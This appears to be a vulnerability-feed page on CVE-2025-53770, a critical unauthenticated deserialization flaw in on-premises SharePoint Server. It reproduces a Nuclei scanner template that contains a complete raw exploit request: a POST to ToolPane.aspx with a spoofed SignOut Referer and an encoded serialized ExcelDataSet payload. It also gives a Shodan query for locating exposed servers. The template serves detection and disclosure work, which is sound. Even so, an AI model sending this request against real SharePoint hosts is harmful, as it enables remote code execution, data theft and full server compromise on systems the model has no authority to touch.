Microsoft SharePoint Remote Code Execution Vulnerability

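Vulnerability Information

Vulnerability name: Microsoft SharePoint Remote Code Execution Vulnerability

Vulnerability ID:

  • CVE: CVE-2025-53770

Vulnerability type: Deserialization

Severity: Critical

Description: Microsoft SharePoint Server is a widely used enterprise collaboration platform that supports document management, team collaboration and business process automation. It is typically deployed on internal corporate networks to improve team collaboration. CVE-2025-53770 is an insecure deserialization issue in SharePoint Server that allows an unauthorized attacker to execute code over the network. The root cause is that SharePoint Server fails to properly validate and sanitize user-supplied data when handling certain requests, so maliciously crafted serialized data can be executed. Exploitation requires no user authentication: an attacker can remotely exploit the vulnerability to execute arbitrary code, which may lead to full control of the server, data disclosure or service disruption. Because Microsoft has confirmed exploitation in the wild and the vulnerability has a CVSS score of 9.8 (critical), all users of affected SharePoint Server versions should apply mitigations immediately to prevent potential attacks.

Vendor: Microsoft

Product: SharePoint Server

Search query: http.component:"Sharepoint"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/948fec84c71530fd88541a16ce52c9af580d2c62/http%2Fcves%2F2025%2FCVE-2025-53770.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details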


id: CVE-2025-53770

info:
  name: Microsoft SharePoint - Remote Code Execution "Toolshell"
  author: SamIntruder
  severity: critical
  description: |
    Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.
  impact: |
    Unauthenticated attackers can exploit unsafe deserialization to achieve remote code execution on SharePoint Server, leading to full system compromise.
  reference:
    - https://github.com/hazcod/CVE-2025-53770/blob/main/pkg/payload/test_payload.go
    - https://x.com/codewhitesec/status/1944743478350557232
    - https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53770
  classification:
    cve-id: CVE-2025-53770
    cvss-score: 9.8
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Sharepoint"
  tags: cve, cve2025, kev, sharepoint, rce

http:
  - raw:
      - |
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: {{Host}}
Referer: /_layouts/SignOut.aspx
Content-Type: application/x-www-form-urlencoded

MSOTlPn_Uri={{Scheme}}://{{Host}}&MSOTlPn_DWP=%0A%3C%25%40%20Register%20Tagprefix%3D%22Scorecard%22%20Namespace%3D%22Microsoft%2EPerformancePoint%2EScorecards%22%20Assembly%3D%22Microsoft%2EPerformancePoint%2EScorecards%2EClient%2C%20Version%3D16%2E0%2E0%2E0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D71e9bce111e9429c%22%20%25%3E%0A%3C%25%40%20Register%20Tagprefix%3D%22asp%22%20Namespace%3D%22System%2EWeb%2EUI%22%20Assembly%3D%22System%2EWeb%2EExtensions%2C%20Version%3D4%2E0%2E0%2E0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35%22%20%25%3E%0A%3Casp%3AUpdateProgress%20ID%3D%22UpdateProgress1%22%20DisplayAfter%3D%2210%22%20runat%3D%22server%22%20AssociatedUpdatePanelID%3D%22upTest%22%3E%0A%20%20%3CProgressTemplate%3E%0A%20%20%20%20%3Cdiv%20class%3D%22divWaiting%22%3E%0A%20%20%20%20%20%20%3CScorecard%3AExcelDataSet%20CompressedDataTable%3D%22H4sIAADEfmgA%2F4WRX2uzMBTG7%2F0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9%2BPEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c%2Bc1Umalp33%2F0%2F62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl%2BftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S%2FVeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1%2Bt%2Fpbj%2BvyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA%3D%22%20DataTable%2DCaseSensitive%3D%22false%22%20runat%3D%22server%22%3E%3C%2FScorecard%3AExcelDataSet%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%20%20%3C%2FProgressTemplate%3E%0A%3C%2Fasp%3AUpdateProgress%3E%0A

    matchers:
      - type: dsl
        name: decoded_response
        dsl:
          - 'contains(gzip_decode(base64_decode(encoded_response)), "IntruderScannerDetectionPayload")'
          - '!contains(body, "SAMLSubmitButton")'
          - 'status_code == 200'
        condition: and

    extractors:
      - type: regex
        part: body
        group: 1
        name: encoded_response
        regex:
          - 'CompressedDataTable="(.*?)"'
        internal: true



http://example.com/2025/07/22/github_3540343723/
Author: lianccc
Published: July 22, 2025